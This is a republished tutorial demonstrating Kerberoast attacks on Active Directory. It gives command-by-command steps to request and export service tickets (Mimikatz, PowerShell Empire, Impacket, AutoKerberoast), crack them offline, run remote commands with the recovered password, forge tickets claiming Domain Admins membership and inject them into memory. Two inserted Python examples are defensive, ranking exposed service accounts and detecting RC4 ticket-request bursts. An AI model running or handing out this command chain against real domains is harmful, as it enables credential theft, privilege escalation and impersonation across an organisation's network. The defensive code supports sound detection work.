
How to demonstrate Kerberoast attacks

2025-01-29 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/02 Report

In this issue, the editor presents a demonstration of how Kerberoast attacks are carried out. The article is rich in content and analyzes the subject from a professional point of view; I hope you take something away from it.

Put simply, a Kerberoast attack is the process by which an attacker attempts to crack Kerberos service tickets, and then rewrite them, in order to gain access to the target service. It is a very common technique among red teams because it requires no interaction with the target service itself: legitimate Active Directory access is enough to request and export service tickets, which are then cracked offline to recover the plaintext password. This works because the service ticket is encrypted with the NTLM hash of the service account's password, so any domain user can dump the hash from the ticket without needing a shell on the system that runs the service.

Attackers usually pick the tickets most likely to be protected by weak passwords, where cracking has a high chance of success. Once a ticket is cracked, the attacker sometimes gains more than access to the service: if the service is configured to run under a highly privileged account, the entire domain may be compromised. Such tickets can be identified by considering a number of factors, such as:

SPN bound to a domain user account

Last password setting (Password last set)

Password expiration time

Last login (Last logon)
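To turn these factors into a repeatable check, here is an added Python example (not from the original article or from any tool it mentions) that ranks LDAP-style account records by Kerberoast exposure so a defender knows which service accounts to remediate first (rotate to a long random password or a managed service account). The userAccountControl flag values are Microsoft's documented ones; the "password never expires" flag stands in for the expiration-time factor, and the score weights, group list and sample records are assumptions made for this example.

```python
from datetime import datetime, timezone

# userAccountControl flag values (documented by Microsoft)
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000   # computer account
UF_DONT_EXPIRE_PASSWD = 0x10000
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

def risk_score(acct, now):
    """Score one account record (a dict mimicking LDAP attributes, constructed
    for this example). Higher score = higher remediation priority."""
    if not acct.get("servicePrincipalName"):
        return 0, ["no SPN: not Kerberoastable"]
    if acct["userAccountControl"] & UF_WORKSTATION_TRUST_ACCOUNT:
        return 0, ["computer account: random, rotating password"]
    score, reasons = 1, ["SPN bound to a user account"]
    age = (now - acct["pwdLastSet"]).days
    if age > 365:
        score += 2; reasons.append(f"password last set {age} days ago")
    if acct["userAccountControl"] & UF_DONT_EXPIRE_PASSWD:
        score += 1; reasons.append("password never expires")
    last = acct.get("lastLogon")
    if last is None or (now - last).days > 90:
        score += 1; reasons.append("no logon in 90 days (unused account?)")
    priv = PRIVILEGED_GROUPS & set(acct.get("memberOf", []))
    if priv:
        score += 3; reasons.append("member of " + ", ".join(sorted(priv)))
    return score, reasons

def audit(accounts, now):
    """Rank accounts by risk, highest first; accounts scoring 0 are dropped."""
    ranked = [(s, a["sAMAccountName"], r) for a in accounts
              for s, r in [risk_score(a, now)] if s]
    return sorted(ranked, key=lambda x: -x[0])

NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)
def _d(y, m, d): return datetime(y, m, d, tzinfo=timezone.utc)
# Constructed sample directory records; not data from any real domain.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/db.pentestlab.local:1433"],
     "userAccountControl": 0x10200, "pwdLastSet": _d(2019, 5, 1), "lastLogon": _d(2024, 2, 28),
     "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "svc_web", "servicePrincipalName": ["HTTP/web.pentestlab.local"],
     "userAccountControl": 0x200, "pwdLastSet": _d(2024, 1, 15), "lastLogon": _d(2024, 2, 29)},
    {"sAMAccountName": "WIN-PTELU2U07KG$", "servicePrincipalName": ["HOST/WIN-PTELU2U07KG"],
     "userAccountControl": 0x1000, "pwdLastSet": _d(2024, 2, 1), "lastLogon": _d(2024, 2, 29)},
    {"sAMAccountName": "alice", "servicePrincipalName": [],
     "userAccountControl": 0x200, "pwdLastSet": _d(2024, 2, 1), "lastLogon": _d(2024, 2, 29)},
]
```

Running audit(SAMPLE_ACCOUNTS, NOW) puts svc_sql (old, never-expiring password, Domain Admins member) at the top and drops the machine account and the SPN-less user entirely.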

Specifically, a Kerberoast attack involves the following five steps:

Service principal name (SPN) discovery

Request service ticket

Export service ticket

Crack the service ticket

Service ticket rewriting & memory injection

In the earlier article on Service Principal Name (SPN) Discovery, we covered how to find services on the network by querying Active Directory for service principal names.

Request service ticket

The easiest way to request a service ticket for a particular SPN is through PowerShell, as Tim Medin showed in his DerbyCon 4.0 presentation.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

Executing the klist command lists all available cache tickets.

klist

Another way to request a service ticket is to specify the service principal name as the target in Mimikatz.

kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80

Similar to klist, the list of Kerberos tickets that exist in memory can be retrieved through Mimikatz. From an existing PowerShell session, the Invoke-Mimikatz script will output all tickets.

Invoke-Mimikatz -Command '"kerberos::list"'

Alternatively, load the Kiwi module, which adds additional Mimikatz commands that perform the same task.

load kiwi
kerberos_ticket_list

Or you can execute a custom Kiwi command:

kiwi_cmd kerberos::list

Impacket includes a Python script that requests Kerberos service tickets only for SPNs bound to domain user accounts, which should be easier to crack than computer-account service tickets. Because it runs from a system that is not joined to the domain, valid domain credentials are needed to interact with Active Directory.

./GetUserSPNs.py -request pentestlab.local/test

The service account hash will also be retrieved in John the Ripper format.

The PowerShell module developed by Matan Hart, part of RiskySPN, can automatically identify weak service tickets. Its main role is to audit the available service tickets that belong to user accounts and find those most likely to be protected by weak passwords, based on the user account and its password expiration policy.

Find-PotentiallyCrackableAccounts -FullData -Verbose

The script provides more detailed output than klist and Mimikatz, including group membership, password validity and the cracking window.

Executing the same module with the domain parameter returns all user accounts with associated service principal names.

Find-PotentiallyCrackableAccounts -Domain "pentestlab.local"

Service ticket information can also be exported in CSV format for offline viewing.

Export-PotentiallyCrackableAccounts

All ticket information that appears in the console will be written to the file.

There is also a script (part of the same repository) that can get the service ticket for the service instance through its SPN.

Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

Tim Medin's Kerberoast toolkit automates the process. Auto-Kerberoast contains Tim's original scripts plus two PowerShell scripts that perform various functions, such as listing and exporting service tickets in Base64, John and Hashcat formats.

List-UserSPNs

There is also a domain parameter that lists only the SPN for a specific domain.

List-UserSPNs -Domain "pentestlab.local"

Export service ticket

Mimikatz is a standard tool for exporting Kerberos service tickets. From a PowerShell session, the following command lists all available tickets in memory and saves them on the remote host.

Invoke-Mimikatz -Command '"kerberos::list /export"'

Similarly, PowerShell Empire has a module that automates the task of extracting Kerberos service tickets.

usemodule credentials/mimikatz/extract_tickets

The module will automatically execute the following command using the Invoke-Mimikatz function.

standard::base64
kerberos::list /export

Service ticket hashes for accounts that support Kerberos authentication can also be extracted directly with a PowerShell Empire module, in either John or Hashcat format.

usemodule credentials/invoke_kerberoast

This module will retrieve the password hash values of all service accounts.

The AutoKerberoast PowerShell script will request and extract all service tickets in base64 format.

Invoke-AutoKerberoast

There is also a script in the AutoKerberoast repository that displays the extracted tickets in a hashcat-compatible format.

Tickets belonging to members of privileged groups in a specific domain can also be extracted for more targeted Kerberoasting.

Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain pentestlab.local -HashFormat John

The Get-TGSCipher PowerShell module developed by Matan Hart can extract the password hash of the service ticket in three different formats: John, Hashcat and Kerberoast. The service principal name the script requires can be retrieved during the SPN discovery step.

Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80" -Format John

The advantage of Get-TGSCipher is that Mimikatz is not needed to export the ticket, which greatly reduces the chance of triggering alerts on the host and removes the step of converting the ticket to John format.
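Whatever client requests the ticket, the domain controller still records every TGS request as Windows Security event 4769 ("A Kerberos service ticket was requested"), so that is where a defender can spot Kerberoasting regardless of the tool used on the endpoint. The following added Python example (not from the original article) runs a simple detection over constructed 4769 records: one account requesting RC4-encrypted tickets (Ticket Encryption Type 0x17) for several distinct services within a short window. The tuple layout, threshold, window and sample events are this example's own assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # Ticket Encryption Type for RC4-HMAC (eType 23); AES is 0x11/0x12

# Constructed sample of the 4769 fields that matter here, one tuple per event:
# (TimeCreated, Account Name, Service Name, Ticket Encryption Type). Not real log data.
SAMPLE_4769 = [
    ("2024-03-01T10:00:01", "test@PENTESTLAB.LOCAL", "PENTESTLAB_001", "0x17"),
    ("2024-03-01T10:00:02", "test@PENTESTLAB.LOCAL", "svc_sql", "0x17"),
    ("2024-03-01T10:00:02", "test@PENTESTLAB.LOCAL", "svc_http", "0x17"),
    ("2024-03-01T10:00:03", "test@PENTESTLAB.LOCAL", "svc_ftp", "0x17"),
    ("2024-03-01T10:00:03", "test@PENTESTLAB.LOCAL", "svc_backup", "0x17"),
    ("2024-03-01T10:00:04", "test@PENTESTLAB.LOCAL", "WIN-PTELU2U07KG$", "0x17"),
    ("2024-03-01T10:05:00", "alice@PENTESTLAB.LOCAL", "krbtgt", "0x12"),
    ("2024-03-01T10:06:00", "alice@PENTESTLAB.LOCAL", "svc_sql", "0x12"),
    ("2024-03-01T11:30:00", "bob@PENTESTLAB.LOCAL", "svc_http", "0x17"),
]

def detect_kerberoast(events, threshold=3, window=timedelta(minutes=5)):
    """Return {account: [services]} for accounts that requested RC4 tickets for at
    least `threshold` distinct user-account services within `window`.
    Machine services (name ends in $) and krbtgt are ignored: their keys are
    random, and normal clients request them all the time."""
    by_user = defaultdict(list)
    for ts, user, svc, etype in events:
        if etype != RC4_HMAC or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[user].append((datetime.fromisoformat(ts), svc))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # slide the window start
            svcs = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(svcs) >= threshold:
                alerts[user] = sorted(svcs)
                break
    return alerts

if __name__ == "__main__":
    for user, svcs in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(svcs)}")
```

In a domain where service accounts support AES, even a single 0x17 request for a user-account SPN is worth investigating, so the threshold can be lowered to 1 there.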

Crack the service ticket

The Python script tgsrepcrack, part of Tim Medin's Kerberoast toolkit, can crack Kerberos tickets using a password list.

python tgsrepcrack.py /root/Desktop/passwords.txt PENTESTLAB_001.kirbi

Lee Christensen has developed a Python script called extractServiceTicketParts, which extracts the hash of the service ticket for us, and a hash cracker called tgscrack written in Go; the two are used together.

python extractServiceTicketParts.py PENTESTLAB_001.kirbi

tgscrack requires the local paths of the hash file and the dictionary file.

tgscrack.exe -hashfile hash.txt -wordlist passwords.txt

The password will be displayed in clear text.

If PowerShell remoting is enabled, you can use the password retrieved from the service ticket to perform operations such as remote commands.

Enable-PSRemoting
$pass = 'Password123' | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList 'PENTESTLAB_001', $pass
Invoke-Command -ScriptBlock {Get-Process} -ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL -Credential $creds

The list of running processes will be retrieved.

Service ticket rewriting & memory injection

Kerberos tickets are signed with the NTLM hash of the service account's password, so once the ticket hash has been cracked, the Kerberoast Python script can rewrite the ticket. This allows the attacker to impersonate any domain user or spoof an account when the service is accessed. Privilege escalation is also possible, because the user can be added to high-privilege groups such as Domain Admins.

python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512

Use the following Mimikatz command to inject the new ticket into memory so that it can be used to authenticate to the target service over Kerberos.

kerberos::ptt PENTESTLAB.kirbi

The above is the editor's demonstration of how Kerberoast attacks are carried out. If you have similar questions, the analysis above may help you understand them; to learn more, follow the industry information channel.
